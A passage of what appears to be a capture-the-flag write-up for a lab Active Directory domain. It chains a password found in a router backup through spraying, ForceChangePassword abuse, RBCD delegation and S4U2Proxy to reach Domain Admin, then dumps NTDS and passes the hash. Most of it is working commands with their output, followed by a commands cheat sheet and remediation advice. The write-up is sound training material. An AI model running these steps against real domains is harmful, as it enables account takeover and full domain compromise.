drwxrwsr-x root/vyattacfg     0 2024-07-05 22:46 config/scripts/
-rwxr-xr-x root/vyattacfg   225 2024-07-05 22:46 config/scripts/vyos-preconfig-bootup.script
-rwxr-xr-x root/vyattacfg   230 2024-07-05 22:46 config/scripts/vyos-postconfig-bootup.script
drwxr-xr-x root/root          0 2024-07-06 15:31 etc/
...
Enter fullscreen mode Exit fullscreen mode

Rest of the archive is a standard Debian-based VyOS root filesystem (/etc, /var, FRR routing daemon state under /var/tmp/frr/, nginx default page under /var/www/html/, etc.) — none of that is directly useful. Cross-checked against VyOS itself which files are worth pulling:

Reference used: confirmed via VyOS documentation that /config/auth/ and /config/config.boot are the primary locations for sensitive material (private keys, API keys, passwords) in a VyOS config backup — VyOS PKI docs, VyOS task T2713, VyOS task T6907, nodespace quick-start guide, VyOS forum thread. This is what justified going straight for config.boot instead of grinding through the whole tarball.

While going through the archive listing, everything under config/archive/ besides config.boot itself turned out to be 0-byte placeholders or compressed rotations - the live config is config/config.boot:

tar -xOzf vyos_backup.tar.gz config/config.boot | less
Enter fullscreen mode Exit fullscreen mode

Inside, under the SSTP VPN config block, a local VPN user with a plaintext password:

        global {
            facility all {
                level "info"
            }
            facility local7 {
                level "debug"
            }
        }
    }
}
vpn {
    sstp {
        authentication {
            local-users {
                username lstanley {
                    password "gB6XTcqVP5MlP7Rc"
                }
            }
            mode "local"
        }
        client-ip-pool SSTP-POOL {
            range "10.0.0.2-10.0.0.100"
        }
        default-pool "SSTP-POOL"
        gateway-address "10.0.0.1"
        ssl {
            ca-certificate "CA"
            certificate "Server"
Enter fullscreen mode Exit fullscreen mode

6. Password Spray #2 - Credential Reuse to svc_sspr

Tried the leaked password directly against the named account first:

nxc smb phantom.vl -u lstanly -p 'gB6XTcqVP5MlP7Rc'
Enter fullscreen mode Exit fullscreen mode
SMB         MACHINE-IP   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         MACHINE-IP   445    DC               [+] phantom.vl\lstanly:gB6XTcqVP5MlP7Rc (Guest)
Enter fullscreen mode Exit fullscreen mode

(A typo — lstanly instead of lstanley - falls back to a Guest session rather than erroring, which is itself worth noting as odd AD behavior.) Rather than chase the exact username, sprayed the full user list instead, since VPN credentials and AD credentials aren't guaranteed to belong to the same account:

kerbrute passwordspray -d phantom.vl --dc dc.phantom.vl users.txt gB6XTcqVP5MlP7Rc
Enter fullscreen mode Exit fullscreen mode
    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/
Version: dev (n/a) - 07/08/26 - Ronnie Flathers @ropnop
2026/07/08 01:00:09 >  Using KDC(s):
2026/07/08 01:00:09 >   dc.phantom.vl:88
2026/07/08 01:00:11 >  [+] VALID LOGIN:  svc_sspr@phantom.vl:gB6XTcqVP5MlP7Rc
2026/07/08 01:00:14 >  Done! Tested 30 logins (1 successes) in 5.370 seconds
Enter fullscreen mode Exit fullscreen mode

The router-config password was actually reused on the svc_sspr service account - a classic case of the same password being recycled across unrelated systems.

Foothold

nxc smb phantom.vl -u svc_sspr -p 'gB6XTcqVP5MlP7Rc'
Enter fullscreen mode Exit fullscreen mode
SMB         MACHINE-IP   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         MACHINE-IP   445    DC               [+] phantom.vl\svc_sspr:gB6XTcqVP5MlP7Rc
Enter fullscreen mode Exit fullscreen mode
nxc ldap phantom.vl -u svc_sspr -p 'gB6XTcqVP5MlP7Rc'
Enter fullscreen mode Exit fullscreen mode
LDAP        MACHINE-IP   389    DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:phantom.vl) (signing:None) (channel binding:No TLS cert)
LDAP        MACHINE-IP   389    DC               [+] phantom.vl\svc_sspr:gB6XTcqVP5MlP7Rc
Enter fullscreen mode Exit fullscreen mode
nxc winrm phantom.vl -u svc_sspr -p 'gB6XTcqVP5MlP7Rc'
Enter fullscreen mode Exit fullscreen mode
WINRM       MACHINE-IP   5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:phantom.vl)
WINRM       MACHINE-IP   5985   DC               [+] phantom.vl\svc_sspr:gB6XTcqVP5MlP7Rc (Pwn3d!)
Enter fullscreen mode Exit fullscreen mode

WinRM is open — full interactive shell:

evil-winrm -i dc.phantom.vl -u svc_sspr -p 'gB6XTcqVP5MlP7Rc'
Enter fullscreen mode Exit fullscreen mode
Evil-WinRM shell v3.9

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_sspr\Documents> whoami
phantom\svc_sspr
*Evil-WinRM* PS C:\Users\svc_sspr\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\svc_sspr\Desktop> ls

    Directory: C:\Users\svc_sspr\Desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---          7/7/2026   9:38 AM             34 user.txt

*Evil-WinRM* PS C:\Users\svc_sspr\Desktop> type user.txt
[REDACTED]
Enter fullscreen mode Exit fullscreen mode

user.txt captured.


7. Privilege Escalation Path - BloodHound

With svc_sspr creds, the BloodHound graph makes the rest of the path obvious.

svc_sspr → ForceChangePassword → three users: rnichols, wsilva, crose. Given the account's role ("SSPR" = self-service password reset), this is a designed capability that's over-permissioned - it lets svc_sspr reset any of these three users' passwords with no knowledge of the old one:

  • SVC_SSPR@PHANTOM.VL - Password Never Expires: TRUE, Outbound Object Control: 3 (→ CROSE, RNICHOLS, WSILVA, each via ForceChangePassword).

rnichols → MemberOf → ICT Security (group) → AddAllowedToAct → DC.PHANTOM.VL. That group has rights to write the msDS-AllowedToActOnBehalfOfOtherIdentity attribute on the DC's computer object — i.e., members can configure Resource-Based Constrained Delegation (RBCD) onto the domain controller itself:

  • RNICHOLS@PHANTOM.VL — MemberOf ICT SECURITY@PHANTOM...AddAllowedToActDC.PHANTOM.VL.

Chained together: svc_sspr → reset a delegatable user's password → that user configures RBCD on DC$ → that user impersonates any principal (including Administrator) against the DC via S4U2Proxy → domain compromise.


8. Exploiting ForceChangePassword → RBCD → Domain Admin

8.1 Abuse ForceChangePassword

bloodyad --host phantom.vl -d phantom.vl -u svc_sspr -p 'gB6XTcqVP5MlP7Rc' \
set password rnichols 'Pwned123!'
Enter fullscreen mode Exit fullscreen mode
[+] Password changed successfully!
Enter fullscreen mode Exit fullscreen mode

Also demonstrated the same primitive via impacket against wsilva, confirming svc_sspr has the same right over each target:

impacket-changepasswd phantom.vl/wsilva@MACHINE-IP -newpass 'Pwned123!' -altuser svc_sspr -altpass 'gB6XTcqVP5MlP7Rc' -reset
Enter fullscreen mode Exit fullscreen mode
Impacket v0.14.0.dev0+20260226.31512.9d3d86ea - Copyright Fortra, LLC and its affiliated companies
[*] Setting the password of phantom.vl\wsilva as phantom.vl\svc_sspr
[*] Connecting to DCE/RPC as phantom.vl\svc_sspr
[*] Password was changed successfully.
[!] User no longer has valid AES keys for Kerberos, until they change their password again.
Enter fullscreen mode Exit fullscreen mode

Confirmed both new passwords work:

nxc smb phantom.vl -u rnichols -p 'Pwned123!'
Enter fullscreen mode Exit fullscreen mode
SMB         MACHINE-IP   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         MACHINE-IP   445    DC               [+] phantom.vl\rnichols:Pwned123!
Enter fullscreen mode Exit fullscreen mode
nxc smb phantom.vl -u wsilva -p 'Pwned123!'
Enter fullscreen mode Exit fullscreen mode
SMB         MACHINE-IP   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         MACHINE-IP   445    DC               [+] phantom.vl\wsilva:Pwned123!
Enter fullscreen mode Exit fullscreen mode

8.2 Configure RBCD

rnichols's ICT Security membership grants write access to configure delegation on the DC's computer object. Normally RBCD from a "clean" attacker path involves creating a fake computer account to act as the delegating principal, but here the MachineAccountQuota is 0 (no new computer objects can be created), so instead of a rogue-computer RBCD, delegation is configured directly for the existing rnichols user account, since it already has the necessary AddAllowedToAct right.

Reference used: confirmed this technique - configuring RBCD directly on a controllable user account instead of a new computer object when MAQ=0 - via The Hacker Recipes: RBCD on SPN-less users. This was found specifically while researching "RBCD from a normal user when Machine Account Quota is zero."

impacket-rbcd -delegate-from 'rnichols' -delegate-to 'DC$' -dc-ip MACHINE-IP -action write phantom.vl/rnichols:'Pwned123!'
Enter fullscreen mode Exit fullscreen mode
Impacket v0.14.0.dev0+20260226.31512.9d3d86ea - Copyright Fortra, LLC and its affiliated companies
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] rnichols can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     rnichols     (S-1-5-21-4029599044-1972224926-2225194048-1112)
Enter fullscreen mode Exit fullscreen mode

rnichols is now written into the DC's msDS-AllowedToActOnBehalfOfOtherIdentity attribute - able to impersonate users against the DC via S4U2Proxy.

8.3 Getting Reliable Kerberos Key Material

Grabbed a TGT for rnichols and tried to inspect the ticket directly:

impacket-getTGT phantom.vl/rnichols:'Pwned123!'
Enter fullscreen mode Exit fullscreen mode
Impacket v0.14.0.dev0+20260226.31512.9d3d86ea - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in rnichols.ccache
Enter fullscreen mode Exit fullscreen mode
export KRB5CCNAME=rnichols.ccache
klist
Enter fullscreen mode Exit fullscreen mode
Ticket cache: FILE:rnichols.ccache
Default principal: rnichols@PHANTOM.VL

Valid starting       Expires              Service principal
07/08/2026 01:22:13  07/08/2026 11:22:13  krbtgt/PHANTOM.VL@PHANTOM.VL
        renew until 07/09/2026 01:22:12
Enter fullscreen mode Exit fullscreen mode
impacket-describeTicket rnichols.ccache
Enter fullscreen mode Exit fullscreen mode
Impacket v0.14.0.dev0+20260226.31512.9d3d86ea - Copyright Fortra, LLC and its affiliated companies
[*] Number of credentials in cache: 1
[*] Parsing credential[0]:
[*] Ticket Session Key            : 58912a8ce7bbc3e7c56bbc2fa5c325c12cdf9214987e244b6e891d54e507dd1a
[*] User Name                     : rnichols
[*] User Realm                    : PHANTOM.VL
[*] Service Name                  : krbtgt/PHANTOM.VL
[*] Service Realm                 : PHANTOM.VL
[*] Start Time                    : 08/07/2026 01:22:13 AM
[*] End Time                      : 08/07/2026 11:22:13 AM
[*] RenewTill                     : 09/07/2026 01:22:12 AM
[*] Flags                         : (0x50e10000) forwardable, proxiable, renewable, initial, pre_authent, enc_pa_rep
[*] KeyType                       : aes256_cts_hmac_sha1_96
[*] Base64(key)                   : WJEqjOe7w+fFa7wvpcMlwSzfkhSYfiRLbokdVOUH3Ro=
[*] Decoding unencrypted data in credential[0]['ticket']:
[*]   Service Name                : krbtgt/PHANTOM.VL
[*]   Service Realm               : PHANTOM.VL
[*]   Encryption type             : aes256_cts_hmac_sha1_96 (etype 18)
[-] Could not find the correct encryption key! Ticket is encrypted with aes256_cts_hmac_sha1_96 (etype 18), but no keys/creds were supplied
Enter fullscreen mode Exit fullscreen mode

describeTicket needs the account's actual key material to fully decode/verify a ticket — a password-based TGT alone in the ccache isn't enough on its own for that step. The reliable way around this is to set a known NT hash on the delegating account directly, so the exact same hash can be fed into every subsequent tool without any ambiguity about what key material is in play:

pypykatz crypto nt 'Pwned123!'
Enter fullscreen mode Exit fullscreen mode
37d7a42022f4c0bc1efdc5d9c0d5eb33
Enter fullscreen mode Exit fullscreen mode

8.4 Repeating Cleanly on crose

Rather than keep working on top of rnichols (which already had its RBCD trust and Kerberos state touched a few times above), the same chain was repeated end-to-end on the second delegatable account, crose, entering the known NT hash from the very start:

impacket-changepasswd phantom.vl/crose@MACHINE-IP -newpass 'Pwned123!' -altuser svc_sspr -altpass 'gB6XTcqVP5MlP7Rc' -reset
Enter fullscreen mode Exit fullscreen mode
Impacket v0.14.0.dev0+20260226.31512.9d3d86ea - Copyright Fortra, LLC and its affiliated companies
[*] Setting the password of phantom.vl\crose as phantom.vl\svc_sspr
[*] Connecting to DCE/RPC as phantom.vl\svc_sspr
[*] Password was changed successfully.
Enter fullscreen mode Exit fullscreen mode
impacket-rbcd -delegate-from 'crose' -delegate-to 'DC$' -dc-ip MACHINE-IP -action write phantom.vl/crose:'Pwned123!'
Enter fullscreen mode Exit fullscreen mode
Impacket v0.14.0.dev0+20260226.31512.9d3d86ea - Copyright Fortra, LLC and its affiliated companies
[*] Accounts allowed to act on behalf of other identity:
[*]     rnichols     (S-1-5-21-4029599044-1972224926-2225194048-1112)
[*] Delegation rights modified successfully!
[*] crose can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     crose        (S-1-5-21-4029599044-1972224926-2225194048-1126)
Enter fullscreen mode Exit fullscreen mode

crose is now added to the DC's msDS-AllowedToActOnBehalfOfOtherIdentity attribute alongside rnichols — both can impersonate users against the DC.

pypykatz crypto nt 'Pwned123!'
Enter fullscreen mode Exit fullscreen mode
37d7a42022f4c0bc1efdc5d9c0d5eb33
Enter fullscreen mode Exit fullscreen mode
impacket-changepasswd -newhashes :37d7a42022f4c0bc1efdc5d9c0d5eb33 phantom.vl/crose@MACHINE-IP
Enter fullscreen mode Exit fullscreen mode
Impacket v0.14.0.dev0+20260226.31512.9d3d86ea - Copyright Fortra, LLC and its affiliated companies
Current password:
[*] Changing the password of phantom.vl\crose
[*] Connecting to DCE/RPC as phantom.vl\crose
[*] Password was changed successfully.
[!] User might need to change their password at next logon because we set hashes (unless password never expires is set).
Enter fullscreen mode Exit fullscreen mode
impacket-getTGT phantom.vl/crose -hashes :37d7a42022f4c0bc1efdc5d9c0d5eb33
Enter fullscreen mode Exit fullscreen mode
Impacket v0.14.0.dev0+20260226.31512.9d3d86ea - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in crose.ccache
Enter fullscreen mode Exit fullscreen mode
impacket-describeTicket crose.ccache
Enter fullscreen mode Exit fullscreen mode
Impacket v0.14.0.dev0+20260226.31512.9d3d86ea - Copyright Fortra, LLC and its affiliated companies
[*] Number of credentials in cache: 1
[*] Parsing credential[0]:
[*] Ticket Session Key            : f325e024f5b7299d3f8b2c2d2c4d4709
[*] User Name                     : crose
[*] User Realm                    : PHANTOM.VL
[*] Service Name                  : krbtgt/PHANTOM.VL
[*] Service Realm                 : PHANTOM.VL
[*] Start Time                    : 08/07/2026 01:52:00 AM
[*] End Time                      : 08/07/2026 11:52:00 AM
[*] RenewTill                     : 09/07/2026 01:51:59 AM
[*] Flags                         : (0x50e10000) forwardable, proxiable, renewable, initial, pre_authent, enc_pa_rep
[*] KeyType                       : rc4_hmac
[*] Base64(key)                   : 8yXgJPW3KZ0/iywtLE1HCQ==
[*] Decoding unencrypted data in credential[0]['ticket']:
[*]   Service Name                : krbtgt/PHANTOM.VL
[*]   Service Realm               : PHANTOM.VL
[*]   Encryption type             : aes256_cts_hmac_sha1_96 (etype 18)
[-] Could not find the correct encryption key! Ticket is encrypted with aes256_cts_hmac_sha1_96 (etype 18), but no keys/creds were supplied
Enter fullscreen mode Exit fullscreen mode

describeTicket still can't locally decode the outer krbtgt ticket (that part is encrypted with the KDC's own key, which is expected - a client is never supposed to be able to decrypt that layer). What matters is that the ccache now carries a well-defined RC4/NT-hash-derived session key, which is exactly what the next step needs to complete the S4U exchange correctly.

8.5 S4U2Self + U2U → S4U2Proxy → Impersonate Administrator

export KRB5CCNAME=crose.ccache
impacket-getST -u2u -impersonate Administrator -spn cifs/dc.phantom.vl phantom.vl/crose -k -no-pass
Enter fullscreen mode Exit fullscreen mode
Impacket v0.14.0.dev0+20260226.31512.9d3d86ea - Copyright Fortra, LLC and its affiliated companies
[*] Impersonating Administrator
[*] Requesting S4U2self+U2U
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_dc.phantom.vl@PHANTOM.VL.ccache
Enter fullscreen mode Exit fullscreen mode

This uses crose's Kerberos ticket, the RBCD trust configured on DC$, and User-to-User (U2U) authentication to request a service ticket as Administrator for cifs/dc.phantom.vl - full impersonation despite crose having no admin rights of its own.

export KRB5CCNAME=Administrator@cifs_dc.phantom.vl@PHANTOM.VL.ccache
klist
Enter fullscreen mode Exit fullscreen mode
Ticket cache: FILE:Administrator@cifs_dc.phantom.vl@PHANTOM.VL.ccache
Default principal: Administrator@phantom.vl

Valid starting       Expires              Service principal
07/08/2026 01:55:48  07/08/2026 11:52:00  cifs/dc.phantom.vl@PHANTOM.VL
        renew until 07/09/2026 01:51:59
Enter fullscreen mode Exit fullscreen mode

8.6 Shell as Administrator

impacket-wmiexec -k -no-pass phantom.vl/administrator@dc.phantom.vl
Enter fullscreen mode Exit fullscreen mode
Impacket v0.14.0.dev0+20260226.31512.9d3d86ea - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
Enter fullscreen mode Exit fullscreen mode
C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is BAA2-45C4
 Directory of C:\
07/06/2024  09:25 AM    <DIR>          Departments Share
04/15/2025  06:21 AM    <DIR>          inetpub
05/08/2021  01:20 AM    <DIR>          PerfLogs
08/14/2025  04:55 AM    <DIR>          Program Files
05/08/2021  02:40 AM    <DIR>          Program Files (x86)
07/11/2024  08:03 AM    <DIR>          Public
07/06/2024  11:40 AM    <DIR>          Users
07/07/2026  10:57 PM    <DIR>          Windows
               0 File(s)              0 bytes
               8 Dir(s)   6,875,144,192 bytes free

C:\>cd Users
C:\Users>dir
 Volume in drive C has no label.
 Volume Serial Number is BAA2-45C4
 Directory of C:\Users
07/06/2024  11:40 AM    <DIR>          .
07/06/2024  11:55 AM    <DIR>          Administrator
07/03/2024  03:18 AM    <DIR>          Public
07/06/2024  11:40 AM    <DIR>          svc_sspr
               0 File(s)              0 bytes
               4 Dir(s)   6,875,144,192 bytes free

C:\Users>cd Administrator/Desktop
C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is BAA2-45C4
 Directory of C:\Users\Administrator\Desktop
07/06/2024  11:55 AM    <DIR>          .
07/06/2024  11:55 AM    <DIR>          ..
07/04/2024  07:22 AM             2,308 Microsoft Edge.lnk
07/07/2026  09:38 AM                34 root.txt
               2 File(s)          2,342 bytes
               2 Dir(s)   6,875,144,192 bytes free

C:\Users\Administrator\Desktop>type root.txt
[REDACTED]
Enter fullscreen mode Exit fullscreen mode

root.txt captured - Domain Admin achieved.


9. Post-Exploitation - NTDS Dump

With the Administrator Kerberos ticket cached, dumped the full NTDS database:

nxc smb phantom.vl --use-kcache --ntds --user Administrator
Enter fullscreen mode Exit fullscreen mode
SMB         phantom.vl      445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         phantom.vl      445    DC               [+] phantom.vl\Administrator from ccache (Pwn3d!)
SMB         phantom.vl      445    DC               [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         phantom.vl      445    DC               Administrator:500:aad3b435b51404eeaad3b435b51404ee:aa2a(snip)2117:::
SMB         phantom.vl      445    DC               [+] Dumped 1 NTDS hashes to /root/.nxc/logs/ntds/DC_phantom.vl_2026-07-08_015951.ntds of which 1 were added to the database
SMB         phantom.vl      445    DC               [*] To extract only enabled accounts from the output file, run the following command:
SMB         phantom.vl      445    DC               [*] grep -iv disabled /root/.nxc/logs/ntds/DC_phantom.vl_2026-07-08_015951.ntds | cut -d ':' -f1
Enter fullscreen mode Exit fullscreen mode

Confirmed pass-the-hash works directly too:

evil-winrm -i MACHINE-IP -u Administrator -H aa2a(snip)12117
Enter fullscreen mode Exit fullscreen mode
Evil-WinRM shell v3.9

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
phantom\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls

    Directory: C:\Users\Administrator\Desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          7/4/2024   7:22 AM           2308 Microsoft Edge.lnk
-ar---          7/7/2026   9:38 AM             34 root.txt

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
[REDACTED]
Enter fullscreen mode Exit fullscreen mode

Full domain compromise confirmed via two independent paths (Kerberos delegation abuse and NTLM pass-the-hash).


Key Vulnerabilities & Attack Chain Summary

Root causes exploited:

  1. Guest/anonymous SMB access to file shares exposing internal documents (Public, later Departments Share).
  2. Hardcoded default password in an onboarding email template, never rotated by at least one employee (ibryant).
  3. Encrypted backup container reachable and downloadable by a low-privileged domain user, cracked offline due to a weak/guessable VeraCrypt passphrase (Phantom2023!).
  4. Plaintext password stored in a network device configuration backup (VyOS config.boot, SSTP VPN local user).
  5. Password reuse between the VPN/router credential and a privileged-by-function AD service account (svc_sspr).
  6. Over-permissioned service account: svc_sspr (meant for self-service password reset) holds ForceChangePassword over multiple standard user accounts with no additional verification.
  7. Excessive delegation rights on a security-named group (ICT Security) granting AddAllowedToAct on the Domain Controller computer object — enabling Resource-Based Constrained Delegation abuse straight to the DC.
  8. MachineAccountQuota = 0 did not fully mitigate RBCD, since an existing controllable user account (no new computer object needed) could still be used as the delegation principal.

Attack chain (condensed):

Guest SMB → Public share → onboarding PDF → default password "Ph4nt0m@5t4rt!"
        → password spray → ibryant (domain user)
        → Departments Share (IT/) → VeraCrypt container (IT_BACKUP_201123.hc)
        → hashcat crack ("Phantom2023!") → mount → vyos_backup.tar.gz
        → config.boot → plaintext SSTP VPN password "gB6XTcqVP5MlP7Rc" (lstanley)
        → password reuse / spray → svc_sspr (WinRM) → user.txt
        → BloodHound: svc_sspr –ForceChangePassword→ rnichols/wsilva/crose
                       rnichols/crose –MemberOf→ ICT Security –AddAllowedToAct→ DC$
        → reset crose's password/hash via svc_sspr (ForceChangePassword)
        → configure RBCD (crose → DC$)
        → S4U2Self+U2U / S4U2Proxy, impersonate Administrator
        → wmiexec as Administrator → root.txt
        → NTDS dump → Administrator NTLM hash → pass-the-hash confirmed
Enter fullscreen mode Exit fullscreen mode

Remediation recommendations:

  • Disable guest/anonymous SMB access; enforce least-privilege share ACLs.
  • Never embed real credentials in onboarding templates; enforce mandatory password change at first logon.
  • Store encrypted backups outside of general-access file shares; use strong, randomly generated passphrases for VeraCrypt/backup encryption.
  • Strip or encrypt credentials in exported network device configuration backups; treat config backups as tier-0 sensitive material.
  • Enforce unique passwords per system/account — no reuse between network infrastructure and AD service accounts.
  • Scope ForceChangePassword and similar delegated AD rights as narrowly as possible; audit any account with password-reset rights over other principals.
  • Restrict GenericWrite/AddAllowedToAct-equivalent rights on Domain Controller computer objects to Domain Admins/Tier-0 only; audit custom groups (like ICT Security) for accidental over-delegation.
  • Monitor for RBCD attribute changes (msDS-AllowedToActOnBehalfOfOtherIdentity) and S4U2Proxy usage via Kerberos event logging (Event ID 4769 with delegation flags).

Appendix: Credentials & Secrets Found

Account / Source Secret Notes
Default onboarding template Ph4nt0m@5t4rt! Sprayed → ibryant
VeraCrypt container (IT_BACKUP_201123.hc) Phantom2023! Cracked via hashcat mode 13721
VyOS config.boot (SSTP local user lstanley) gB6XTcqVP5MlP7Rc Reused as svc_sspr's AD password
svc_sspr gB6XTcqVP5MlP7Rc WinRM foothold, user.txt
rnichols (reset) Pwned123! ForceChangePassword abuse; RBCD initially configured here
wsilva (reset, demo only) Pwned123! Confirmed ForceChangePassword works; not used further
crose (reset, then set to known hash) Pwned123! → NT hash 37d7a42022f4c0bc1efdc5d9c0d5eb33 Used for the working RBCD/S4U2Proxy path
Administrator NT hash aa2(snip)117 From NTDS dump; pass-the-hash confirmed
user.txt [REDACTED] C:\Users\svc_sspr\Desktop\user.txt
root.txt [REDACTED] C:\Users\Administrator\Desktop\root.txt

Appendix: Useful Commands Reference

# Guest share/RID enum
nxc smb <ip> -u 'guest' -p '' --shares
nxc smb <ip> -u 'guest' -p '' --rid-brute

# eml → pdf attachment
munpack tech_support_email.eml

# Password spray
kerbrute passwordspray -d <domain> --dc <dc> users.txt '<password>'

# LDAP groups / BloodHound
nxc ldap <domain> -u <user> -p '<pass>' --groups
nxc ldap <domain> -u <user> -p '<pass>' --groups "<GroupName>"
bloodhound-python -u <user> -p '<pass>' -d <domain> -dc <dc> -ns <ip> -c All --zip

# Crack VeraCrypt container
hashcat -m 13721 container.hc wordlist.txt --force
veracrypt container.hc /mnt/ --password='<cracked pw>'

# Abuse ForceChangePassword
bloodyad --host <dc> -d <domain> -u <user> -p '<pass>' set password <target> '<newpass>'
impacket-changepasswd <domain>/<target>@<ip> -newpass '<newpass>' -altuser <attacker> -altpass '<pass>' -reset

# Configure RBCD (MAQ=0, no new computer object needed)
impacket-rbcd -delegate-from '<user>' -delegate-to '<TargetComputer>$' -dc-ip <ip> -action write <domain>/<user>:'<pass>'

# Set a known NT hash directly (for reliable Kerberos key material)
impacket-changepasswd -newhashes :<NTHASH> <domain>/<user>@<ip>
impacket-getTGT <domain>/<user> -hashes :<NTHASH>

# S4U2Self+U2U / S4U2Proxy impersonation
impacket-getST -u2u -impersonate Administrator -spn cifs/<dc-fqdn> <domain>/<user> -k -no-pass
impacket-wmiexec -k -no-pass <domain>/administrator@<dc-fqdn>

# NTDS dump via cached Kerberos ticket
nxc smb <domain> --use-kcache --ntds --user Administrator

# Pass-the-hash
evil-winrm -i <ip> -u Administrator -H <NTHASH>
Enter fullscreen mode Exit fullscreen mode

Top comments (0)